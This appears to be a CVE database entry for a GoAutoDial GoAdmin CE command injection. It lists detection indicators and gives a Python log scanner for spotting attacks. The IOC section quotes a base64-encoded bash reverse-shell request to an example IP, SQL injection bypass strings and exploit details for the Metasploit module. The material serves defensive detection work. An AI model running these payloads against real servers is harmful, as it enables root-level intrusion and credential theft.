CVE-2015-2845
published 2015-05-12


Priority: P1 · 79 · critical
CVSS 2.0: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
EXPLOIT
EPSS: 71.69% (99.3th percentile)
The cpanel function in go_site.php in GoAutoDial GoAdmin CE before 3.3-1421902800 allows remote attackers to execute arbitrary commands via the $type portion of the PATH_INFO.

Affected

2 ranges
Vendor | Product | Version range | Fixed in
goautodial | goadmin_ce | |
goautodial | goadmin_ce | |

Detection & IOCs (extracted from sources)

url: /index.php/go_site/cpanel/|| bash -c "eval `echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode`"
path: /index.php/go_site/cpanel/
path: /index.php/go_login/validate_credentials/
path: /index.php/go_site/go_get_user_info/
path: /sounds/go_bogus.wav.php
command: || bash -c "eval `echo -n <base64payload> | base64 --decode`"
path: /changelog.txt
path: /var/lib/asterisk/sounds
process: /usr/share/goautodial/goautodialc.pl
  • Detect command injection attempts in PATH_INFO targeting the cpanel function: look for URL-encoded pipe/shell metacharacters (e.g., %7C%7C, ||) followed by base64-encoded payloads in requests to /index.php/go_site/cpanel/
  • Detect SQLi authentication bypass: POST to /index.php/go_login/validate_credentials with user_pass containing URL-encoded SQL injection string '%20or%20'1'%3D'1' or literal ' OR '1'='1
  • Detect SQLi data exfiltration: GET request to /index.php/go_site/go_get_user_info/ with PATH_INFO containing ' OR active='Y to dump admin credentials from the database
  • Detect version check reconnaissance: unauthenticated GET request to /changelog.txt; a response body NOT containing '1421902800' indicates a vulnerable GoAutoDial instance
  • Detect malicious file upload: filenames matching the pattern go_*.wav.php uploaded to the audiostore endpoint, exploiting insufficient extension validation
  • Monitor execution of /usr/share/goautodial/goautodialc.pl with unexpected arguments containing shell metacharacters (||, &&, ;) as this is the underlying exec target for the command injection
  • The Metasploit module uses User-Agent 'Mozilla/5.0' with Accept-Encoding 'identity' across all exploit requests; correlate this UA with the specific attack URIs for higher-fidelity detection
  • The command injection PoC uses a hardcoded attacker IP (192.168.0.11) and port (4444) in the base64 payload; real-world attacks will use different IPs/ports encoded in base64, so detections must decode and inspect base64 blobs rather than matching the literal example IP
  • The Metasploit module hardcodes the payload as a base64-encoded reverse-tcp bash one-liner; the handler must be configured for cmd/unix/reverse_bash to receive the connection
  • Any GoAutoDial 3.3 version between 3.3-1406088000 and 3.3-1421902800 may be vulnerable; the fixed version is 3.3-1421902800 identifiable via changelog.txt
  • Command injection is executed with root privileges, meaning post-exploitation activity will appear as root; process lineage from goautodialc.pl to bash should be treated as high severity
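
The cpanel PATH_INFO check and the decode-the-blob caveat from the list above, as an added example (not code from this page's sources): it URL-decodes each request, isolates the $type portion after /index.php/go_site/cpanel/, flags shell metacharacters, and decodes any base64 run so the command can be inspected. The access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import unquote

CPANEL = "/index.php/go_site/cpanel/"             # endpoint named on this page
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SHELL_META = re.compile(r"\|\||&&|[;`]|\$\(")    # ||, &&, ;, backtick, $(
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_blobs(text):
    """Decode base64-looking runs so the command itself can be inspected."""
    decoded = []
    for blob in B64_RUN.findall(text):
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            decoded.append(raw.decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64-encoded text; skip it
    return decoded


def inspect_line(log_line):
    """Return a finding dict for a suspicious cpanel request, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    path = unquote(match.group(1))                # %7C%7C becomes ||
    if CPANEL not in path:
        return None
    type_part = path.split(CPANEL, 1)[1]          # the $type portion of PATH_INFO
    if not SHELL_META.search(type_part):
        return None
    return {"type": type_part, "decoded": decode_blobs(type_part)}


# Constructed sample lines (not real traffic). The blob is base64 of a harmless echo.
BLOB = base64.b64encode(b"echo constructed-sample").decode()
SAMPLE = [
    '10.0.0.5 - - [01/Jan/2024:00:00:01 +0000] "GET /index.php/go_site/cpanel/start HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Jan/2024:00:00:02 +0000] "GET /index.php/go_site/cpanel/'
    '%7C%7C%20bash%20-c%20%22eval%20%60echo%20' + BLOB +
    '%20%7C%20base64%20--decode%60%22 HTTP/1.1" 200 0',
    '10.0.0.7 - - [01/Jan/2024:00:00:03 +0000] "GET /changelog.txt HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(inspect_line(line))
```

Alerting on the decoded text rather than the encoded blob keeps the rule independent of whatever address or port a given request embeds.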